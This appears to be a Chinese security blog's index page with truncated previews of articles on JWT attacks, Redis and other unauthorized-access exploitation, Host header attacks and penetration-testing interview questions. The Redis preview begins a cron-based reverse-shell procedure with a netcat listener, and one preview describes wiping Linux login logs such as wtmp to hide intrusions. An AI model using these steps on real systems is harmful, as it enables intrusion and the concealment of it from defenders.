Loading ...
JWT 攻击方式
一、JWT 基础认知 1. 定义与结构 JSON Web Token(JWT)是一种基于 JSON 的轻量级身份验证令牌,用于在客户端与服务端之间安全传递声明信息,常见于单点登录(SSO)场景。 结构组成:由 3 部分通过.拼接,分别为: Header(头部):Base64 编码的 JSON,包含令牌类型(typ: "JWT")和签名算法(alg:…
常见未授权漏洞及利用方式
1. Redis 未授权访问(默认端口 6379) 漏洞特征 默认无密码验证,允许匿名登录; 4.x/5.0.5 前版本支持通过主从复制加载恶意模块执行命令; 高权限运行时可写入系统文件(如计划任务、SSH 密钥)。 利用方式 计划任务反弹 Shell # 本地监听端口 nc -lvp 4444   # 连接目标Redis并写入任务 redis-c…
探秘 Host 碰撞
在网络安全领域,有些漏洞看似不起眼,却可能成为攻击者突破防线的关键。Host 碰撞(Host Header Attack)就是这样一种常被忽视却风险不小的漏洞。它不像 SQL 注入、XSS 那样广为人知,却能让攻击者绕过防护,悄无声息地访问到本不该被暴露的内部资源。今天,我们就来揭开 Host 碰撞的神秘面纱,从原理到防御,全方位搞懂这个漏洞。 一…
Linux 入侵痕迹清理
一、清除登录日志 登录日志是记录用户登录行为的核心凭证,需针对性清理各类日志文件及相关记录。 1. 核心日志文件及处理方式 (1)二进制日志(记录登录 / 注销及最后登录信息) /var/log/wtmp:对应 last 命令,记录所有用户登录、注销信息(二进制格式)。 处理方式:需用专业工具(如 Linux 登录日志修改脚本)解析二进制结构,精准…
安全加固与应急响应面试题
1. 安全加固都有哪些点需要加固? 网络层:防火墙配置(白名单策略)、入侵检测 / 防御系统(IDS/IPS)部署、端口封禁(关闭非必要端口)、VPN 加密、DDoS 防护。 系统层:账号安全(密码策略、禁用空密码、删除冗余账号)、权限控制(最小权限原则)、补丁更新(高危漏洞修复)、日志审计开启、恶意代码防护(杀毒软件)。 应用层:Web 漏洞修复…
协议攻击面试题
1. “心脏滴血” 漏洞和 “贵宾犬” 漏洞的原理是什么? 心脏滴血(Heartbleed,CVE-2014-0160): 是 OpenSSL 库中 TLS 心跳协议的实现漏洞。心跳协议允许客户端 / 服务器发送 “心跳请求”(包含数据长度和数据),对方需原样返回。漏洞在于:当请求中声明的数据长度(length)大于实际数据长度时,OpenSSL …
反序列化漏洞面试题
1. 什么是序列化和反序列化? 序列化:将内存中的对象转换为可存储(如文件、数据库)或可传输(如网络流)的字节流 / 字符串的过程。 反序列化:将序列化后的字节流 / 字符串恢复为原对象的过程,是序列化的逆操作。 2.为什么要进行序列化和反序列化? 内存中的对象无法直接存储或传输,需通过序列化转换为通用格式(字节流 / 字符串)。 解决不同系统、语…
渗透测试面试题
1. 什么是渗透测试? 渗透测试(Penetration Testing)是一种模拟恶意攻击者的合法授权测试,通过主动探测、漏洞利用等手段,评估目标系统(网站、服务器、内网等)的安全性,发现潜在漏洞(如 SQL 注入、逻辑漏洞),并提供修复建议,最终目的是提升系统防御能力。 2. 如何进行渗透测试? 遵循 “规划→执行→报告” 流程: 前期规划:明…
信息收集面试题
1. 什么是信息收集?主动收集与被动收集的核心区别是什么? 信息收集:指通过技术或非技术手段,系统性收集目标对象(如企业、网站、服务器等)的各类信息(网络架构、资产范围、人员信息、技术栈等),为后续渗透测试提供基础。 主动收集与被动收集的核心区别: 主动收集:直接与目标系统交互(如发送请求、扫描端口),可能被目标检测到(有 “痕迹”); 被动收集:…
逻辑漏洞面试题
1. 逻辑漏洞主要产生的位置有哪些? 逻辑漏洞通常源于业务逻辑设计缺陷或实现错误,常见位置包括: 身份认证与授权:登录、注册、密码找回、权限校验等环节。 数据处理:表单提交、参数验证、数据流转(如金额篡改、订单状态伪造)。 业务流程:支付、退款、优惠券使用、库存管理等。 验证码机制:验证码生成、验证、有效期管理。 会话管理:Session 固定、会…